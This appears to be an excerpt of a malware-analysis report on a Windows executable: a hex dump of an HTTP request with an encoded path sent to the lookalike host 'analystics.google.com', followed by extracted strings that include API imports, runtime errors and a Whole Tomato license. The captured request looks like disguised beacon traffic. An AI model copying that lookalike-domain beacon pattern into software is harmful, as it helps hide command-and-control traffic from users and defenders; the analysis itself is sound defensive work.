0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   7745306b 596f4773 36416b56 61204854   wE0kYoGs6AkVa HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

Strings

P.rsrcVtratceuritorla
\
.CC
 
}Z.A.Z.
.
.
..
zn
.
..
.P
.

3+KDk
\/Ej~
                                 H
         (((((                  H
         h((((                  H
ICON1
ICON2
ICON3
jH'K
kernel32.dll
KERNEL32.DLL
LRK:
mscoree.dll
WJ*D
YANDEX	SEARCHENG
                          
,-(<">
@@@\&&&
%%%%%!'
%%%%%$
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0OP=B$
0SSSSS
0xS&fA
1ZJ;s&r
21`	bl	
:2hHCbE
:3106#O%X
3"N\q_|A
3x5(?(
;4<FtE
4^k"p=j
4rRwPx
4Y	^9o-
-5128~
56y+#4
?5cMQF
5RTC/4O
5u$c$iO
6*9<N3
+6a/0ONXc
(6aEsF
6=>H9>C
6Q \W8
7~*67~#
7OIqS{
7Uwd'I
 7y+tB
8Bs5=>
8c[VW1
8{ -Cx
94<Mjzo
9	!ELb
9XTITC
a3(2w.
>>AA===Y]
A!B])B
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADMQCFZQ
AH!g~zU
;[A_~%i,sg~
A;<J*.
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
:Aw:c5
^a.:wk
)/"B4x
Baa	c,
b},BH-<
BeginPaint
{BH%W+|
BMRU-3
$%B~o7!
B<TUDI[kq
C(.|} 
]c2DmH
>>CAAGGF
CCC\HHH@EEE+<<<
C-e11a
CgDv	?
ci:Bdz
c$$$O...B4444555#000
|c.o)Q
CorExitProcess
cP!j{~V1^
credui.dll
CredUIParseUserNameA
- CRT not initialized
,_'C#*T3Y0
cU`eoe
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. 
DOMAIN error
_>drh`
,DuC'7
\D-/VS
\D+/VS
e4	5NVi
+E5'/E
}!Eb7Q	XD
~{e`H-zpz
EncodePointer
EnterCriticalSection
eQ03bF
,Eq-s"
ExitProcess
EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. 
FCEJZZx|
FC %|T
February
fkg_r&
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
&+:&f,n
&FQN*O{
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
[/..fv
F`xu&?
g/1\*3
\g7J	d
GCg?:@
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCommandLineW
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserDefaultLangID
GetUserObjectInformationA
GetVersion
GetVersionExA
gJxUNa
g<s5.C
#GW7vD
gw$Vd,)
#){h!;
h~a']8^}r$O}
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
h`L(C}(&
h<~]zC
I9sdLC
&:-IBs$
ifHHeJJZZ[[{|
^I`g~CFQ^^
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
I[/w&U
:*j>>>
JanFebMarAprMayJunJulAugSepOctNovDec
January
J-Bg&IC
J#GW~}
j@j ^V
jK>2( 
_`j+]v
]]]JXXX0XXX
J*z4s]c
K'7}C,%
{[$>Ke@
KERNEL32.dll
KpZU$3
Ktz6ZCT
L#~?4zN
Last modified: Mayk
LCMapStringA
LCMapStringW
LeaveCriticalSection
LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective 
l(=js5\+
LoadIconW
LoadLibraryA
LoadStringW
lstrcmpiA
L(zN1d
M7}C,-
Mb "RW
MessageBoxA
m?h2/7
m`hG 7.
Microsoft Visual C++ Runtime Library
M+kA:W
mL*R-]
MM/dd/yy
Monday
MultiByteToWideChar
M}$vUm
\mw~AA
<{])mz
 n0	wQ
na8/2rm
NAV]\E}
'}Nik}@
N#'j"-\%	
n{JnZ_~
n&kcx=K
nnnSlll3vvv
Noay19	
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
~nvSCWaa$
N'yqBp
Nzz(a$bpk+
$'$o1}
o^=3 FeR
,/oAB]]UG
October
OF]]]\\
oftware). 
OQrUFg
P}}}}}}}}}}
,,P0JMu
PD)C sT
pFZZfq<9;
(pG|%t
PhY8p 
PIHIcV:9L
PLc5.~9^
Please contact the application's support team for more information.
PPPPPPPP
PPPPPPPPPPPPP
Program: 
<program name unknown>
PS_f~F>EMk
- pure virtual function call
Qe{ffJJJ[e{
qqq	@@@
QRS\,`
QueryPerformanceCounter
QWRTggitz
r 0%,kp
\R1@XS
r,\%:4
#R5*B3
RA>e\R
`.rdata
RtlUnwind
runtime error 
Runtime Error!
S7'r9T
Saturday
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
SING error
sk1k$G$
=SOFTu
SOFTWARE LICENSE AGREEMENT
sQ3Iee
srNYZ}
^__SSe
Sunday
SunMonTueWedThuFriSat
S}uu<kcc%XTT
}Sv%jh
Sw7ys@
SXbEPs
	sZc,>
t.111stt
TEMQ^cc
TerminateProcess
TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. 
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t"SS9]
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
UA7gr4
!uCYEN
UFC=M:Mjo
.}UfwY
- unable to initialize heap
- unable to open console device
UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. 
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UQPXY]Y[
URPQQh
USER32.dll
USER32.DLL
Uu#euJ
:::	UUU
V59ZLu
\vE U@
VirtualAlloc
VirtualFree
v	N+D$
V_@o4=
vy:.%<
)w-.):
Wednesday
_?w$g/^
:$W=Hu
WideCharToMultiByte
wiiym^^cMBBKA666"
Wl,ogN
WriteFile
)X9o26
;}X<KdY
X.!:q#
{]-xS+}Q
xvvwvwx
[X\X\Q
XXTX\Q
y2UN*7
>=Yt1j
}Z9j	<o]
<zc)2)
;*ZjXT3B%
zMlfM7f36a